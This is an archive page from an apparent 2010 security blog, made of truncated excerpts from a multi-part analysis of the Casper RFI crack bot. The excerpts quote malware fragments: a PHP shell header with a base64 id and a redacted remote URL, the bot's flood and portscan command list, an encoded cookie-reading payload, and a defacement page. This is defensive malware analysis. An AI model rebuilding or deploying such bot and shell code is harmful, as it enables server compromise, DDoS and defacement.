Irregular Expressions:

August, 2010


August 27, 2010  1:14 PM

Casper RFI crack bot – Part 9



Posted by: Dan O'Connor
casper bot, casper rfi perl bot, perl bot, www perl bot

So it looks like sh.txt is all about shell access, wow what a surprise! The next item is def.txt, there is not a whole lot in there beside the defacement message, so we are going to move on. The next item is a tar.gz, psy.tar.gz.  Let's unpack it and look around. It's from a project...

August 27, 2010  11:59 AM

Casper RFI crack bot – Part 8



Posted by: Dan O'Connor
casper bot, casper rfi perl bot, perl bot, www perl bot

We have one more to decode, $shell_data

$shell_data = "$visitcount = $HTTP_COOKIE_VARS["visits"];
if( $visitcount == "") {
     $visitcount = 0;
     $visitor = $_SERVER["REMOTE_ADDR"];
     $web = $_SERVER["HTTP_HOST"];
     $inj = $_SERVER["REQUEST_URI"];
     $target =...


August 27, 2010  8:48 AM

Casper RFI crack bot – Part 7



Posted by: Dan O'Connor
casper bot, casper rfi perl bot, perl bot, www perl bot

At first I was thinking that these might be encrypted, but that did not turn out to be the case. The first one we found was...


August 27, 2010  8:33 AM

Casper RFI crack bot – Part 6



Posted by: Dan O'Connor
casper bot perl, casper perl, casper rfi bot, perl bot, www bot

We can do something fun with this,

$defacer     = "def.txt";
less def.txt
<title>-- Hacked bY XXXXXXXX --</title>
Off to Google we go, this won't give an exact number, but we are going to be able to get a count of the number of web servers this guy...


August 22, 2010  9:44 PM

Casper RFI crack bot – Part 5



Posted by: Dan O'Connor
casper perl, casper rfi bot, casper.pl

Some of the sh.txt script seems to be pretty old, calling milw0rm and darkc0de, both sites are no longer up and have not been for a while. There is also a few things worth looking in to here, the script mentions fx29shell.php.  Which is a php shell that can be loaded onto the system. I can...


August 21, 2010  12:26 AM

Casper RFI crack bot – Part 4



Posted by: Dan O'Connor
backdoor, casper, perl rfi crack bot, rootkit, sudo exploit

sh.txt This one also looks juicy! Another php, <?php $sh_id = "Q2FTcEVyX0thRUB5YWhPTy5jT20="; $sh_ver = "0.0 01.01.2010"; $sh_name = base64_decode($sh_id).$sh_ver; $sh_mainurl = "http://xxxxxx.ru/config/"; $html_start =...


August 21, 2010  12:12 AM

Casper RFI crack bot – Part 3



Posted by: Dan O'Connor
casper perl bot

iso.txt is looking promising for a peak.

#!/usr/bin/perl
#
#  ShellBOT by: XXXXXXXXXXXX
#       Greetz: XXXXXXXXXXXXXX
#
# Comandos:
#           @oldpack <ip> <bytes> <tempo>;
#           @udp <ip> <porta> <tempo>;
#           @fullportscan...


August 21, 2010  12:04 AM

Casper RFI crack bot – Part 2



Posted by: Dan O'Connor
perl rfi bot

There is more then one file in each rar that appears to be a copy of the bot. The differences are pretty minor.

scan.txt
-my @servers = ("irc.xxxx.org");
+my @servers = ("irc.xxxxxx.org","irc.xxxxxx.org");

@@ -3,7 +3,7 @@
 ################################
 #  CASPER RFI CRACK Bot v1.1 ...


August 20, 2010  10:31 PM

Casper RFI crack bot – Part 1



Posted by: Dan O'Connor
casper rfi, casper rfi bot, casper unix, rfi bot, unix bot

If you saw the ISC today (isc.sans.edu) there is a posting about a perl Unix bot making the rounds. http://isc.sans.edu/diary.html?storyid=9430 There is signatures around from emerging threats to detect the bot, if you need them. http://doc.emergingthreats.net/2011176 I have found a server...


August 16, 2010  5:21 PM

Good blog on iPhone / iPad hacking



Posted by: Dan O'Connor
ipad jail break, iphone jail break

http://blog.iphone-dev.org/ I wish I could link to the first article.  It talks about a patch out for non early iPhone and iPod touch users that leaves them with security holes, that they fixed and can be applied through Cydia! I really appreciate people that take their time to give back...


Forgot Password

No problem! Submit your e-mail address below. We'll send you an e-mail containing your password.

Your password has been sent to: